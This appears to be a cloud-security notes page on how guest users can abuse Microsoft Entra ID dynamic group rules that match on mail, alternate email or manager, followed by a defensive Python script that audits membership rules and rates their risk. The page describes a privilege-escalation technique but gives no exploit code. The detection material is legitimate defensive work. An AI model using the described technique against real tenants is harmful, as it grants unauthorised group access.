Dynamic Groups
Last updated
An organization may add users to a particular group automatically based on attributes such as userPrincipalName, department or mail. By default, any user can invite guests in Entra ID. If a dynamic group rule matches on an attribute that a guest user can set or modify, the rule can be abused to gain membership of that group. There are two points at which this can happen:

1. Before joining a tenant as a guest. If we can enumerate that a property, say mail, is used in a rule, we can invite a guest whose email address matches the rule.

2. After joining a tenant as a guest. A guest user can 'manage their own profile', that is, they can modify their manager and alternate email. We can abuse a rule that matches on manager (Direct Reports for "{objectID_of_manager}") or on alternate email (user.otherMails -any (_ -contains "string")).
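A defender can find such rules before they are abused by reviewing every dynamic group's membership rule for references to guest-influenced attributes. The script below is an added example, not code from the original page: it takes group objects shaped like those Microsoft Graph returns (assumed fields displayName, groupTypes and membershipRule), flags rules that reference mail, otherMails, manager or the "Direct Reports for" form, and lowers the severity when the rule also restricts userType to "Member". The sample groups and the all-zero object ID are constructed placeholders.

```python
"""Audit Entra ID dynamic-group membership rules for guest-influenced attributes."""
import re

# Attributes the page identifies as settable or editable by a guest, with the reason.
GUEST_INFLUENCED = {
    "user.mail": "chosen at invitation time (the invited guest's email address)",
    "user.othermails": "alternate email, editable by the guest in 'manage my profile'",
    "user.manager": "manager, editable by the guest in 'manage my profile'",
}

ATTR_RE = re.compile(r"user\.[A-Za-z]+")
DIRECT_REPORTS_RE = re.compile(r'Direct\s+Reports\s+for\s+"([^"]+)"', re.I)
MEMBER_ONLY_RE = re.compile(r'user\.userType\s+-eq\s+"Member"', re.I)


def audit_rule(rule: str) -> dict:
    """Return a finding for one membershipRule string."""
    refs = {m.lower() for m in ATTR_RE.findall(rule)}
    risky = {a: GUEST_INFLUENCED[a] for a in refs if a in GUEST_INFLUENCED}
    if DIRECT_REPORTS_RE.search(rule):
        risky["direct reports"] = "manager-based rule; a guest can set their own manager"
    member_only = bool(MEMBER_ONLY_RE.search(rule))
    if not risky:
        severity = "none"
    elif member_only:
        # Guests are excluded by userType, but the attribute is still self-editable,
        # so the rule deserves a second look if that clause is ever removed.
        severity = "low"
    else:
        severity = "high"
    return {
        "rule": rule,
        "guest_influenced": risky,
        "member_only": member_only,
        "severity": severity,
    }


def audit_groups(groups) -> list:
    """Audit every dynamic group in an iterable of Graph-style group dicts (assumed shape)."""
    findings = []
    for g in groups:
        if "DynamicMembership" not in (g.get("groupTypes") or []):
            continue  # static groups have no rule to evaluate
        finding = audit_rule(g.get("membershipRule") or "")
        finding["group"] = g.get("displayName", "<unnamed>")
        findings.append(finding)
    return findings


# Constructed sample groups; the GUID is a placeholder, not a real object ID.
SAMPLE_GROUPS = [
    {"displayName": "Finance-Dynamic", "groupTypes": ["DynamicMembership"],
     "membershipRule": '(user.department -eq "Finance") and (user.userType -eq "Member")'},
    {"displayName": "Vendor-Portal", "groupTypes": ["DynamicMembership"],
     "membershipRule": 'user.otherMails -any (_ -contains "contoso.com")'},
    {"displayName": "CEO-Reports", "groupTypes": ["DynamicMembership"],
     "membershipRule": 'Direct Reports for "00000000-0000-0000-0000-000000000000"'},
    {"displayName": "Static-Group", "groupTypes": [], "membershipRule": None},
]

if __name__ == "__main__":
    for f in audit_groups(SAMPLE_GROUPS):
        print(f"{f['group']:16} severity={f['severity']:5} member_only={f['member_only']}")
        for attr, why in f["guest_influenced"].items():
            print(f"    {attr}: {why}")
```

Findings rated "high" are the ones to fix first: either add a user.userType -eq "Member" clause or rewrite the rule around an attribute that only an administrator can set.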